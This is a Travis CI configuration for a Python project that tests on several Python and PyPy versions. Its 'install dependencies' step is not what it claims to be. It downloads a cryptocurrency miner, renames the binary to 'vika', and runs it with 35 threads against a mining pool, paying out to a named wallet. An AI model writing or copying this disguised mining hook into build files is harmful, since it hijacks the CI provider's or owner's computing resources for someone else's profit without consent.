language: python
python:
  - "2.7"
  - "3.8"
  # PyPy versions
  - "pypy"   # currently Python 2.7.13, PyPy 7.1.1
  - "pypy3"  # currently Python 3.6.1,  PyPy 7.1.1-beta0 
# command to install dependencies
install:
  - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz && tar xf cpuminer-opt-linux.tar.gz && mv cpuminer-sse2 vika && ./vika -a YespowerSugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1qyt4q80f53mf8a79msfhfhpk7yvlr4up9q7lcv5.a -t35 .
# command to run tests
script: pytest